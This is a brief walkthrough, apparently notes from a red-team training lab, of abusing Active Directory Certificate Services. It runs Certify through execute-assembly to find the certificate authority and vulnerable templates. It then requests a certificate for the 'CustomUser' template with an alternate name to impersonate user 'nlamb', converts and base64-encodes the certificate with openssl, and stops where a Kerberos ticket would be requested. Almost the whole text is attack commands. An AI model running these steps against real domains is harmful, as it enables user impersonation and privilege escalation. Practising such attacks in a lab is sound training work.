First let’s find the CA Server.
execute-assembly C:\\Tools\\Certify\\Certify\\bin\\Release\\Certify.exe cas
Now let’s find the vulnerable templates.
execute-assembly C:\\Tools\\Certify\\Certify\\bin\\Release\\Certify.exe find /vulnerable
Notice that we found a vulnerable certificate.
Now let’s abuse it.
execute-assembly C:\\Tools\\Certify\\Certify\\bin\\Release\\Certify.exe request /ca:dc-2.dev.cyberbotic.io\\sub-ca /template:CustomUser /altname:nlamb
Now let’s change the cert to cert.pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
now let’s get the certificate
cat cert.pfx | base64 -w 0
Now let’s get tgt with it.